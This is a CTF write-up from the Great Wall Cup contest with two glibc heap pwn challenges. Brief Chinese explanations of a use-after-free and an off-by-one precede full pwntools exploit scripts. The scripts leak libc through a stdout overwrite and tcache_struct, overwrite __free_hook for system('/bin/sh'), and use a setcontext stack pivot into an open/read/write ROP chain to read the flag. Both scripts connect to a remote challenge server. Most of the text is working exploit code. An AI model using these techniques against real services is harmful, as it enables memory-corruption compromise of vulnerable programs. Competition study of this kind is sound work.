长城杯

长城杯wp

高校组好卷,出来这么多题还是进不了线下,最后是16名。。。题目的话pwn都是常规题,还有一道虚拟机的题日后有时间复现复现

img

1.

这题漏洞点挺多,第一个如下图,free后指针没置0

img

第二个off-by-one漏洞

img

因为没有输出功能,所以我们直接打stdout泄露出libc_base,再用unsortedbin attack将free_hook上方写入\x7f然后直接打free_hook

不知道为啥最近利用malloc_hook、realloc_hook打gadget总是失败,execve的第三个参数总是不为0

exp:

from pwn import *
#io=process('./pwn',env={'LD_PRELOAD':'./libc.so.6'})
#io=process('./pwn')
elf = ELF('./pwn')  # local copy of the target binary; not referenced again in this script
libc = ELF('./libc.so.6')  # every libc symbol offset used in exp() is read from this file
context.log_level = 'debug'  # echoes each send/recv, which is how failed attempts in the retry loop below show up

def add(index, size):
    """Pick menu entry '1', then answer the index and size prompts in decimal."""
    dialogue = (
        ('>> \n', '1'),
        ('input index:\n', str(index)),
        ('size:\n', str(size)),
    )
    for prompt, answer in dialogue:
        io.sendlineafter(prompt, answer)

def dele(index):
    """Pick menu entry '2', then answer the index prompt in decimal."""
    dialogue = [('>> \n', '2'), ('input index:\n', str(index))]
    for prompt, answer in dialogue:
        io.sendlineafter(prompt, answer)

def edit(index, context):
    """Pick menu entry '3', answer the index prompt, then send `context` raw.

    The final send uses sendafter, so no newline is appended: callers add
    their own '\\n' where they want one.
    """
    menu_choice = '3'
    slot = str(index)
    io.sendlineafter('>> \n', menu_choice)
    io.sendlineafter('input index:\n', slot)
    io.sendafter('context:\n', context)

def gift():
    """Send menu choice '666' (defined but never called by exp() in this script)."""
    choice = '666'
    io.sendlineafter('>> \n', choice)

def exp():
    """Run the chain for challenge 1 over the already-open `io`.

    Every statement is an ordered exchange with the target's menu, so the
    sequence must not be reordered. The code concatenates ``str`` literals
    with ``p16``/``p64`` output, which only works on Python 2 pwntools; on
    Python 3 those ``+`` expressions raise ``TypeError``.
    """
    add(0,0x88)#0
    add(1,0x68)#1
    add(2,0x78)#2
    add(3,0x68)#3
    add(4,0x18)#4
    edit(1,'a'*0x68+p16(0xf1))  # 0x68 bytes of padding plus a 2-byte value: one byte past the slot (the off-by-one the write-up mentions)

    dele(2)

    dele(3)
    add(2,0x78)#2
    edit(3,p16(0x85dd)+'\n')  # NOTE(review): fixed 2-byte value; presumably the reason the caller retries up to 20 times -- confirm
    add(5,0x68)#5 = 3

    add(6,0x68)#6 stdout
    edit(6,'a'*0x33+p64(0xfbad1887)+p64(0)*3+p8(0x88)+'\n')  # the stdout overwrite described in the write-up; the leak is read right after
    stdin=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))  # take the last 6 bytes up to the 0x7f byte and zero-pad to 8
    libc_base=stdin-libc.symbols['_IO_2_1_stdin_']
    print('libc_base',hex(libc_base))
    malloc_hook=libc_base+libc.symbols['__malloc_hook']
    gadget=[0x45226,0x4527a,0xf03a4,0xf1247]  # not used below (see the write-up's remark about failed gadget attempts)
    free_hook=libc_base+libc.symbols['__free_hook']
    system=libc_base+libc.symbols['system']
    edit(3,p64(malloc_hook+88+16)+p64(free_hook-0x28)+'\n')  # the unsortedbin write described in the write-up

    add(9,0x68)
    #gdb.attach(io)


    dele(1)

    edit(1,p64(free_hook-0x1b)+'\n')

    add(1,0x68)#1
    add(7,0x68)#7

    edit(7,'/bin/sh\x00'+'a'*(0xb-8)+p64(system)+'\n')


    dele(7)  # the free on slot 7 is the trigger step; everything before only prepares it

    io.interactive()

#exp()
# Retry wrapper: exp() is attempted up to 20 times, reconnecting on every pass.
i=0
while(i!=20):
    try:
        #io=process('./pwn',env={'LD_PRELOAD':'./libc.so.6'})
        #io=process('./pwn')
        io=remote('47.104.190.157' ,26840)
        exp()
        i+=1
    except:  # NOTE(review): bare except also swallows KeyboardInterrupt; if remote() itself fails on the first pass, `io` is unbound and io.close() raises NameError
        io.close()
        i+=1

2.

开了沙箱

img

这个题的漏洞点在free后没有置0

img

且申请的大小也被限制在0x10~0x60之间,我们利用tcache_struct这个大小为0x250的chunk来获得libc_base,接着利用free_hook执行setcontext函数将栈迁到堆上执行我们构造的rop读取flag

exp:

from pwn import *
#io=process('./pwn',env={'LD_PRELOAD':'./libc.so.6'})
io=remote('47.104.190.157' ,25329)  # connection opened at import time; exp() at the bottom runs once against it, with no retry loop
#io=process('./pwn')
elf=ELF('./pwn')  # local copy of the target binary; not referenced again in this script
libc=ELF('./libc.so.6')  # libc symbol offsets used in exp() come from this file
#libc=elf.libc
context.log_level='debug'  # echoes every send/recv

def add(index, size):
    """Pick menu entry '1', then answer the index and size prompts in decimal."""
    dialogue = (
        ('>> \n', '1'),
        ('index:', str(index)),
        ('size:\n', str(size)),
    )
    for prompt, answer in dialogue:
        io.sendlineafter(prompt, answer)

def dele(index):
    """Pick menu entry '2', then answer the index prompt in decimal."""
    dialogue = [('>> \n', '2'), ('index:', str(index))]
    for prompt, answer in dialogue:
        io.sendlineafter(prompt, answer)

def edit(index, context):
    """Pick menu entry '3', answer the index prompt, then send `context` raw.

    The last send uses sendafter, so nothing is appended to `context`.
    """
    menu_choice = '3'
    slot = str(index)
    io.sendlineafter('>> \n', menu_choice)
    io.sendlineafter('index:', slot)
    io.sendafter('context:\n', context)

def show(index):
    """Pick menu entry '4' and answer the index prompt; the caller reads the reply."""
    dialogue = (('>> \n', '4'), ('index:', str(index)))
    for prompt, answer in dialogue:
        io.sendlineafter(prompt, answer)
def exp():
    """Run the chain for challenge 2 over the already-open `io`.

    Ordered menu interaction; do not reorder statements. As in the first
    script, ``str`` literals are concatenated with ``p64`` output, so this
    only runs under Python 2 pwntools.
    """
    add(0,0x60)#0
    add(1,0x60)#1
    add(2,0x60)#2
    dele(0)
    dele(1)
    show(1)
    heap_base=u64(io.recvuntil('\x55')[-6:].ljust(8,'\x00'))-0x770-0x40  # reads up to a 0x55 byte (presumably the top byte of a heap pointer) and subtracts a fixed offset
    print('heap_base',hex(heap_base))
    add(1,0x60)#1


    edit(0,p64(heap_base))
    add(3,0x60)#3

    add(0,0x60)#tcache -- the 0x250-byte tcache_struct chunk the write-up refers to
    edit(0,'\x07'*0x30+'\x00'*(0x60-0x30))
    #gdb.attach(io)
    dele(0)
    add(4,0x40)
    edit(0,'a'*0x50)

    show(0)
    io.recvuntil('a'*0x50)  # skip the 0x50 bytes of padding just written, the leak follows
    malloc_hook=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-96-16  # 6-byte libc pointer ending in 0x7f, minus a fixed offset
    libc_base=malloc_hook-libc.symbols['__malloc_hook']
    print('libc_base',hex(libc_base))
    free_hook=libc_base+libc.symbols['__free_hook']
    pop_rdi=0x00000000000215bf+libc_base  # NOTE(review): gadget offsets are hard-coded for the bundled libc.so.6
    pop_rsi=0x0000000000023eea+libc_base
    pop_rdx=0x0000000000001b96+libc_base
    pop_rax=0x0000000000043ae8+libc_base  # not used below
    open64=libc_base+libc.symbols['open']
    read=libc_base+libc.symbols['read']
    syscall=read+15  # not used below
    write=libc_base+libc.symbols['write']
    setcontext=libc_base+libc.symbols['setcontext']+53
    edit(0,'\x00'*2+'\x01'+'\x00'*(0x40-3)+p64(0)*2+p64(free_hook-0x8))

    add(5,0x38)#free_hook
    edit(0,'\x00'*0x40+p64(0)+p64(0x211)+p64(malloc_hook+96+16))

    add(6,0x58)#6

    add(7,0x58)#7
    edit(0,'./flag\x00')  # presumably the path argument for the open step in the comment below -- confirm
    edit(1,p64(heap_base+0x880+0x40))
    edit(7,'\x00'*0x40+p64(heap_base+0x880+0x40)+p64(pop_rdi))
    edit(5,p64(heap_base+0xb10+0x40-0xa0)+p64(setcontext))
    #open(./flag,0)
    shellcode=p64(heap_base)+p64(open64)
    #read(fd,addr,0x30) shellcode+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(heap_base)+p64(pop_rdx)+p64(0x30)+p64(read)
    # NOTE(review): the read step above shares a line with its comment, so as listed it is never executed
    # (possibly a line break lost when the page was rendered) -- confirm against the original script.
    #write(1,addr,0x30)
    shellcode+=p64(pop_rdi)+p64(1)+p64(write)
    edit(2,shellcode)
    dele(6)  # the free on slot 6 is the trigger step
    io.interactive()
exp()  # single run against the connection opened at the top of the script; no retry loop here